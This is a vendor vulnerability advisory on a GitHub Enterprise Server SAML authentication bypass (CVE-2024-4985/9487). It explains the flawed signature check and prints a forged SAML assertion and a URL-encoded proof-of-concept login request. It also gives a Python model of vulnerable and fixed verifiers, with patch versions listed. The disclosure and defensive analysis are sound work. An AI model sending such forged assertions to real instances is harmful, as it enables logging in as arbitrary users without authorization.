[2024.11 Vulnerability Report] Github Enterprise Server Authentication Bypass | Cloud-Based Platform AIONCLOUD


Vulnerability report written by the TA team after analyzing the GitHub Enterprise Server authentication bypass.
The vulnerability is an authentication bypass in GitHub Enterprise Server (GHES). By sending a crafted SAML response to a GHES instance that has SAML SSO with encrypted assertions enabled, an attacker can bypass the signature verification step and log in as an arbitrary GHES account. The vulnerability was patched in GHES 3.11.16, 3.12.10, 3.13.5 and 3.14.2, and AIWAF continuously monitors for related vulnerabilities.

1. Overview

GitHub, which provides hosting for the distributed version control tool Git, has disclosed CVE-2024-4985 and CVE-2024-9487, authentication bypass vulnerabilities in GitHub Enterprise Server (GHES), its self-hosted paid enterprise edition. The technical analysis summarized below is taken from the ProjectDiscovery write-up. (Figure source: https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass)

2. Attack Type

GitHub Enterprise Server (GHES) supports SAML SSO and, optionally, encrypted assertions, in which the IdP encrypts the assertion it sends to GHES. Encrypted assertions are disabled by default; only instances that have enabled the feature are affected. With encrypted assertions enabled, the verification logic checks that a Signature element is present outside the Assertion block and that the Signature's Reference ID matches the ID of the enclosing assertion. That check is meant to stop an attacker from wrapping a forged assertion into a legitimately signed response. It does not, however, verify the signature over the assertion itself. An attacker who obtains any valid SAMLResponse issued by the IdP can therefore append a forged Assertion node: the presence and ID checks still pass, the forged subject is accepted, and the attacker gains access to an arbitrary GHES account. Example assertion used in the proof of concept (https://your-ghes-instance.com is a placeholder for the target instance):
<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>
Request as sent by the Nuclei template (Host, cookie and RelayState values are placeholders):
POST /saml/consume HTTP/1.1
Content-Length: 1227
Content-Type: application/x-www-form-urlencoded
Cookie: saml_csrf_token=sample_token; saml_csrf_token_legacy=sample_token
Host: www.test.com
User-Agent: HTTPie

RelayState=sample_token&SAMLResponse=%3CAssertion+ID%3D%221234567890%22+IssueInstant%3D%222024-05-21T06%3A40%3A00Z%22+Subject%3D%22CN%3DJohn+Doe%2COU%3DUsers%2CO%3DAcme+Corporation%2CC%3DUS%22%3E%3CAudience%3Ehttps%3A%2F%2Fyour-ghes-instance.com%3C%2FAudience%3E%3CSubjectConfirmation+Method%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Aassertion%3Amethod%3Abearer%22%3E%3CSubjectConfirmationData%3E%3CNameID+Type%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Anameid-type%3Apersistent%22+Format%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Anameid-format%3Abasic%22%3Ejdoe%3C%2FNameID%3E%3C%2FSubjectConfirmationData%3E%3C%2FSubjectConfirmation%3E%3CAuthnStatement+AuthnInstant%3D%222024-05-21T06%3A40%3A00Z%22+AuthnContextClassRef%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Aassertion%3AAuthnContextClassRef%3Aunspecified%22%3E%3CAuthnMethod%3Eurn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3AmethodName%3Apassword%3C%2FAuthnMethod%3E%3C%2FAuthnStatement%3E%3CAttributeStatement%3E%3CAttribute+Name%3D%22urn%3Aoid%3A1.3.6.1.4.1.11.2.17.19.3.4.0.10%22%3EAcme+Corporation%3C%2FAttribute%3E%3CAttribute+Name%3D%22urn%3Aoid%3A1.3.6.1.4.1.11.2.17.19.3.4.0.4%22%3Ejdoe%40acme.com%3C%2FAttribute%3E%3C%2FAttributeStatement%3E%3C%2FAssertion%3E
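To make the failure mode concrete, the Python below models the two verification strategies described above. It is an added illustration, not GHES code and not the ProjectDiscovery proof of concept: element names are simplified SAML without namespaces, and an HMAC under a constructed key (IDP_KEY) stands in for the IdP's XML-DSig signature. vulnerable_subject() reproduces the presence-and-ID checks from the text without checking the signature value; verified_subject() is the corrected logic. Which Assertion the pre-patch code read the subject from is not stated on the page, so the model reads the last one, which is where an appended node lands.

```python
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Constructed stand-in for the IdP's signing key. Real SAML uses XML-DSig
# (an RSA signature over a canonicalised element); an HMAC over the
# serialised element models the same trust boundary without the XML-DSig
# machinery. Element names are simplified SAML, not the real namespaces.
IDP_KEY = b"constructed-idp-signing-key"


def canonical(elem):
    """Serialise one element by itself (tail text dropped so the bytes are
    identical whether the element is parsed alone or inside a Response)."""
    elem = copy.deepcopy(elem)
    elem.tail = None
    return ET.tostring(elem, encoding="utf-8")


def sign(elem):
    """Signature value over an element, as the IdP would compute it."""
    return hmac.new(IDP_KEY, canonical(elem), hashlib.sha256).hexdigest()


def idp_response(subject, assertion_id="_a1"):
    """A legitimate SAMLResponse: one Assertion plus a Signature outside it
    whose Reference points at that Assertion's ID."""
    assertion_xml = f'<Assertion ID="{assertion_id}"><Subject>{subject}</Subject></Assertion>'
    sig = sign(ET.fromstring(assertion_xml))
    return ("<Response>"
            f'<Signature><Reference URI="#{assertion_id}"/>'
            f"<SignatureValue>{sig}</SignatureValue></Signature>"
            f"{assertion_xml}</Response>")


def forge(legit_response, victim, assertion_id="_a1"):
    """Attacker step from the text: keep the IdP-issued response intact and
    append an unsigned Assertion naming the victim, reusing the signed ID so
    the Reference check still finds a match."""
    fake = f'<Assertion ID="{assertion_id}"><Subject>{victim}</Subject></Assertion>'
    return legit_response.replace("</Response>", fake + "</Response>")


def _signature_reference(root):
    """Locate the Signature outside the Assertion and the ID it references."""
    sig = root.find("Signature")
    if sig is None:
        raise ValueError("no Signature outside the Assertion")
    return sig, sig.find("Reference").get("URI").lstrip("#")


def vulnerable_subject(response_xml):
    """Models the pre-patch checks: a Signature must exist outside the
    Assertion and its Reference must match an Assertion ID, but the
    SignatureValue is never verified and the subject is read from the last
    Assertion (modelling assumption, see lead-in)."""
    root = ET.fromstring(response_xml)
    _, ref = _signature_reference(root)
    assertions = root.findall("Assertion")
    if not any(a.get("ID") == ref for a in assertions):
        raise ValueError("Signature does not reference an Assertion")
    return assertions[-1].findtext("Subject")


def verified_subject(response_xml):
    """Hardened verifier: exactly one Assertion, it must be the referenced one,
    and the signature over its bytes must verify before its subject is trusted."""
    root = ET.fromstring(response_xml)
    sig, ref = _signature_reference(root)
    assertions = root.findall("Assertion")
    if len(assertions) != 1 or assertions[0].get("ID") != ref:
        raise ValueError("unexpected Assertion count or unreferenced Assertion")
    expected = sig.findtext("SignatureValue") or ""
    if not hmac.compare_digest(sign(assertions[0]), expected):
        raise ValueError("Assertion signature does not verify")
    return assertions[0].findtext("Subject")


def accepted_subject(verifier, response_xml):
    """Subject the verifier would log in, or None if it rejects the response."""
    try:
        return verifier(response_xml)
    except ValueError:
        return None


if __name__ == "__main__":
    legit = idp_response("jdoe")
    forged = forge(legit, "admin")
    for name, verifier in (("vulnerable", vulnerable_subject), ("verified", verified_subject)):
        print(name, "legit ->", accepted_subject(verifier, legit),
              "| forged ->", accepted_subject(verifier, forged))
```

Running it shows vulnerable_subject accepting the forged response as admin while verified_subject rejects both the appended assertion and any edit to the signed one. The lesson for any SAML consumer is the same as the fix here: resolve the subject only from the element whose signature was actually verified, and reject responses that carry more assertions than expected.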

3. Response

The vulnerability was first fixed as CVE-2024-4985 in GHES versions 3.9.15, 3.10.12, 3.11.10 and 3.12.4. That fix was later found to be incomplete, and the issue was fixed again as CVE-2024-9487 in GHES versions 3.11.16, 3.12.10, 3.13.5 and 3.14.2. Because the bypass consists of injecting an additional, forged assertion node into an otherwise legitimate SAML response, there is no request pattern that distinguishes it reliably from normal SAML traffic; a pattern-based AIWAF rule would also flag legitimate requests, so this vulnerability is not treated as a pattern-detectable case.

4. Conclusion

GitHub Enterprise Server is the self-hosted edition of the GitHub platform and is used by many organizations, so an authentication bypass in it is a high-severity, high-impact vulnerability. Organizations running GitHub Enterprise Server should make sure their instances are always patched to the latest version. Our AIWAF products continue to monitor GitHub and GitHub Enterprise Server for vulnerabilities, and we will keep responding to relevant vulnerabilities as they are discovered.

5. References

https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass